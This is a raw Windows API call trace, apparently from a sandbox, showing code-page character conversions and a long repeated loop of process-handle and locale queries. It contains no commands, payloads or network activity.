lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿfÏwf\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0076.031] GetLastError () returned 0x0 [0076.031] SetLastError (dwErrCode=0x0) [0076.031] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0076.031] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0076.031] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0076.032] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0076.032] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿfÏwf\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0076.032] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x41c28b) returned 0x0 [0076.032] RtlSizeHeap (HeapHandle=0x3fb0000, Flags=0x0, MemoryPointer=0x3fb2f18) returned 0x80 [0076.033] GetCurrentProcess () returned 0xffffffff [0076.033] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.033] GetSystemDefaultLangID () returned 0x24d0409 [0076.033] GetThreadLocale () returned 0x409 [0076.033] GetCurrentProcess () returned 0xffffffff [0076.033] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.033] GetSystemDefaultLangID () returned 0x24d0409 [0076.033] GetThreadLocale () returned 0x409 [0076.034] GetCurrentProcess () returned 0xffffffff [0076.034] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.034] GetSystemDefaultLangID () returned 0x24d0409 [0076.034] GetThreadLocale () returned 0x409 [0076.034] GetCurrentProcess () returned 0xffffffff [0076.034] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.034] GetSystemDefaultLangID () returned 0x24d0409 [0076.034] GetThreadLocale () returned 0x409 [0076.034] GetCurrentProcess () returned 0xffffffff [0076.034] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.034] GetSystemDefaultLangID () returned 0x24d0409 [0076.034] GetThreadLocale () returned 0x409 [0076.034] GetCurrentProcess () returned 0xffffffff [0076.034] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.034] GetSystemDefaultLangID () returned 0x24d0409 [0076.034] GetThreadLocale () returned 0x409 [0076.034] GetCurrentProcess () returned 0xffffffff [0076.034] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.034] GetSystemDefaultLangID () returned 0x24d0409 [0076.034] GetThreadLocale () returned 0x409 [0076.034] GetCurrentProcess () returned 0xffffffff [0076.034] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.034] GetSystemDefaultLangID () returned 0x24d0409 [0076.034] GetThreadLocale () returned 0x409 [0076.034] GetCurrentProcess () returned 0xffffffff [0076.034] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.034] GetSystemDefaultLangID () returned 0x24d0409 [0076.034] GetThreadLocale () returned 0x409 [0076.034] GetCurrentProcess () returned 0xffffffff [0076.035] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.035] GetSystemDefaultLangID () returned 0x24d0409 [0076.035] GetThreadLocale () returned 0x409 [0076.035] GetCurrentProcess () returned 0xffffffff [0076.035] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.035] GetSystemDefaultLangID () returned 0x24d0409 [0076.035] GetThreadLocale () returned 0x409 [0076.035] GetCurrentProcess () returned 0xffffffff [0076.035] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.035] GetSystemDefaultLangID () returned 0x24d0409 [0076.035] GetThreadLocale () returned 0x409 [0076.035] GetCurrentProcess () returned 0xffffffff [0076.035] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.035] GetSystemDefaultLangID () returned 0x24d0409 [0076.035] GetThreadLocale () returned 0x409 [0076.035] GetCurrentProcess () returned 0xffffffff [0076.035] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.035] GetSystemDefaultLangID () returned 0x24d0409 [0076.035] GetThreadLocale () returned 0x409 [0076.035] GetCurrentProcess () returned 0xffffffff [0076.035] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.035] GetSystemDefaultLangID () returned 0x24d0409 [0076.035] GetThreadLocale () returned 0x409 [0076.035] GetCurrentProcess () returned 0xffffffff [0076.035] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.035] GetSystemDefaultLangID () returned 0x24d0409 [0076.035] GetThreadLocale () returned 0x409 [0076.035] GetCurrentProcess () returned 0xffffffff [0076.036] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.036] GetSystemDefaultLangID () returned 0x24d0409 [0076.036] GetThreadLocale () returned 0x409 [0076.036] GetCurrentProcess () returned 0xffffffff [0076.036] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.036] GetSystemDefaultLangID () returned 0x24d0409 [0076.036] GetThreadLocale () returned 0x409 [0076.036] GetCurrentProcess () returned 0xffffffff [0076.036] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.036] GetSystemDefaultLangID () returned 0x24d0409 [0076.036] GetThreadLocale () returned 0x409 [0076.036] GetCurrentProcess () returned 0xffffffff [0076.036] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.036] GetSystemDefaultLangID () returned 0x24d0409 [0076.055] GetThreadLocale () returned 0x409 [0076.055] GetCurrentProcess () returned 0xffffffff [0076.055] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.056] GetSystemDefaultLangID () returned 0x24d0409 [0076.056] GetThreadLocale () returned 0x409 [0076.056] GetCurrentProcess () returned 0xffffffff [0076.056] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.056] GetSystemDefaultLangID () returned 0x24d0409 [0076.056] GetThreadLocale () returned 0x409 [0076.056] GetCurrentProcess () returned 0xffffffff [0076.056] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.056] GetSystemDefaultLangID () returned 0x24d0409 [0076.056] GetThreadLocale () returned 0x409 [0076.056] GetCurrentProcess () returned 0xffffffff [0076.056] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.056] GetSystemDefaultLangID () returned 0x24d0409 [0076.056] GetThreadLocale () returned 0x409 [0076.056] GetCurrentProcess () returned 0xffffffff [0076.056] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.056] GetSystemDefaultLangID () returned 0x24d0409 [0076.056] GetThreadLocale () returned 0x409 [0076.056] GetCurrentProcess () returned 0xffffffff [0076.056] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.056] GetSystemDefaultLangID () returned 0x24d0409 [0076.056] GetThreadLocale () returned 0x409 [0076.056] GetCurrentProcess () returned 0xffffffff [0076.056] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.056] GetSystemDefaultLangID () returned 0x24d0409 [0076.056] GetThreadLocale () returned 0x409 [0076.056] GetCurrentProcess () returned 0xffffffff [0076.056] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.057] GetSystemDefaultLangID () returned 0x24d0409 [0076.057] GetThreadLocale () returned 0x409 [0076.057] GetCurrentProcess () returned 0xffffffff [0076.057] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.057] GetSystemDefaultLangID () returned 0x24d0409 [0076.057] GetThreadLocale () returned 0x409 [0076.057] GetCurrentProcess () returned 0xffffffff [0076.057] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.057] GetSystemDefaultLangID () returned 0x24d0409 [0076.057] GetThreadLocale () returned 0x409 [0076.057] GetCurrentProcess () returned 0xffffffff [0076.057] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.057] GetSystemDefaultLangID () returned 0x24d0409 [0076.057] GetThreadLocale () returned 0x409 [0076.057] GetCurrentProcess () returned 0xffffffff [0076.057] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.057] GetSystemDefaultLangID () returned 0x24d0409 [0076.057] GetThreadLocale () returned 0x409 [0076.057] GetCurrentProcess () returned 0xffffffff [0076.057] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.057] GetSystemDefaultLangID () returned 0x24d0409 [0076.057] GetThreadLocale () returned 0x409 [0076.057] GetCurrentProcess () returned 0xffffffff [0076.057] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.057] GetSystemDefaultLangID () returned 0x24d0409 [0076.057] GetThreadLocale () returned 0x409 [0076.057] GetCurrentProcess () returned 0xffffffff [0076.058] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.058] GetSystemDefaultLangID () returned 0x24d0409 [0076.058] GetThreadLocale () returned 0x409 [0076.058] GetCurrentProcess () returned 0xffffffff [0076.058] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.058] GetSystemDefaultLangID () returned 0x24d0409 [0076.058] GetThreadLocale () returned 0x409 [0076.058] GetCurrentProcess () returned 0xffffffff [0076.058] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.058] GetSystemDefaultLangID () returned 0x24d0409 [0076.058] GetThreadLocale () returned 0x409 [0076.058] GetCurrentProcess () returned 0xffffffff [0076.058] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.058] GetSystemDefaultLangID () returned 0x24d0409 [0076.058] GetThreadLocale () returned 0x409 [0076.058] GetCurrentProcess () returned 0xffffffff [0076.058] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.058] GetSystemDefaultLangID () returned 0x24d0409 [0076.058] GetThreadLocale () returned 0x409 [0076.058] GetCurrentProcess () returned 0xffffffff [0076.058] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.058] GetSystemDefaultLangID () returned 0x24d0409 [0076.058] GetThreadLocale () returned 0x409 [0076.058] GetCurrentProcess () returned 0xffffffff [0076.058] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.058] GetSystemDefaultLangID () returned 0x24d0409 [0076.058] GetThreadLocale () returned 0x409 [0076.058] GetCurrentProcess () returned 0xffffffff [0076.059] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.059] GetSystemDefaultLangID () returned 0x24d0409 [0076.059] GetThreadLocale () returned 0x409 [0076.059] GetCurrentProcess () returned 0xffffffff [0076.059] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.059] GetSystemDefaultLangID () returned 0x24d0409 [0076.059] GetThreadLocale () returned 0x409 [0076.059] GetCurrentProcess () returned 0xffffffff [0076.059] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.059] GetSystemDefaultLangID () returned 0x24d0409 [0076.059] GetThreadLocale () returned 0x409 [0076.059] GetCurrentProcess () returned 0xffffffff [0076.059] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.059] GetSystemDefaultLangID () returned 0x24d0409 [0076.059] GetThreadLocale () returned 0x409 [0076.059] GetCurrentProcess () returned 0xffffffff [0076.059] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.059] GetSystemDefaultLangID () returned 0x24d0409 [0076.059] GetThreadLocale () returned 0x409 [0076.059] GetCurrentProcess () returned 0xffffffff [0076.059] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.059] GetSystemDefaultLangID () returned 0x24d0409 [0076.059] GetThreadLocale () returned 0x409 [0076.059] GetCurrentProcess () returned 0xffffffff [0076.059] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.059] GetSystemDefaultLangID () returned 0x24d0409 [0076.059] GetThreadLocale () returned 0x409 [0076.059] GetCurrentProcess () returned 0xffffffff [0076.059] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.060] GetSystemDefaultLangID () returned 0x24d0409 [0076.060] GetThreadLocale () returned 0x409 [0076.060] GetCurrentProcess () returned 0xffffffff [0076.060] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.060] GetSystemDefaultLangID () returned 0x24d0409 [0076.060] GetThreadLocale () returned 0x409 [0076.060] GetCurrentProcess () returned 0xffffffff [0076.060] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.060] GetSystemDefaultLangID () returned 0x24d0409 [0076.060] GetThreadLocale () returned 0x409 [0076.060] GetCurrentProcess () returned 0xffffffff [0076.060] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.060] GetSystemDefaultLangID () returned 0x24d0409 [0076.060] GetThreadLocale () returned 0x409 [0076.060] GetCurrentProcess () returned 0xffffffff [0076.060] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.060] GetSystemDefaultLangID () returned 0x24d0409 [0076.060] GetThreadLocale () returned 0x409 [0076.060] GetCurrentProcess () returned 0xffffffff [0076.060] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.060] GetSystemDefaultLangID () returned 0x24d0409 [0076.060] GetThreadLocale () returned 0x409 [0076.060] GetCurrentProcess () returned 0xffffffff [0076.060] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.060] GetSystemDefaultLangID () returned 0x24d0409 [0076.060] GetThreadLocale () returned 0x409 [0076.060] GetCurrentProcess () returned 0xffffffff [0076.060] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.060] GetSystemDefaultLangID () returned 0x24d0409 [0076.060] GetThreadLocale () returned 0x409 [0076.060] GetCurrentProcess () returned 0xffffffff [0076.060] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.060] GetSystemDefaultLangID () returned 0x24d0409 [0076.060] GetThreadLocale () returned 0x409 [0076.061] GetCurrentProcess () returned 0xffffffff [0076.061] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.061] GetSystemDefaultLangID () returned 0x24d0409 [0076.061] GetThreadLocale () returned 0x409 [0076.061] GetCurrentProcess () returned 0xffffffff [0076.061] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.061] GetSystemDefaultLangID () returned 0x24d0409 [0076.061] GetThreadLocale () returned 0x409 [0076.061] GetCurrentProcess () returned 0xffffffff [0076.061] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.061] GetSystemDefaultLangID () returned 0x24d0409 [0076.061] GetThreadLocale () returned 0x409 [0076.061] GetCurrentProcess () returned 0xffffffff [0076.061] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.061] GetSystemDefaultLangID () returned 0x24d0409 [0076.061] GetThreadLocale () returned 0x409 [0076.061] GetCurrentProcess () returned 0xffffffff [0076.061] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.061] GetSystemDefaultLangID () returned 0x24d0409 [0076.061] GetThreadLocale () returned 0x409 [0076.061] GetCurrentProcess () returned 0xffffffff [0076.061] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.061] GetSystemDefaultLangID () returned 0x24d0409 [0076.061] GetThreadLocale () returned 0x409 [0076.061] GetCurrentProcess () returned 0xffffffff [0076.061] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.061] GetSystemDefaultLangID () returned 0x24d0409 [0076.061] GetThreadLocale () returned 0x409 [0076.061] GetCurrentProcess () returned 0xffffffff [0076.061] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.061] GetSystemDefaultLangID () returned 0x24d0409 [0076.061] GetThreadLocale () returned 0x409 [0076.061] GetCurrentProcess () returned 0xffffffff [0076.061] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.062] GetSystemDefaultLangID () returned 0x24d0409 [0076.062] GetThreadLocale () returned 0x409 [0076.062] GetCurrentProcess () returned 0xffffffff [0076.062] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.062] GetSystemDefaultLangID () returned 0x24d0409 [0076.062] GetThreadLocale () returned 0x409 [0076.062] GetCurrentProcess () returned 0xffffffff [0076.062] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.062] GetSystemDefaultLangID () returned 0x24d0409 [0076.062] GetThreadLocale () returned 0x409 [0076.062] GetCurrentProcess () returned 0xffffffff [0076.062] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.062] GetSystemDefaultLangID () returned 0x24d0409 [0076.062] GetThreadLocale () returned 0x409 [0076.062] GetCurrentProcess () returned 0xffffffff [0076.062] 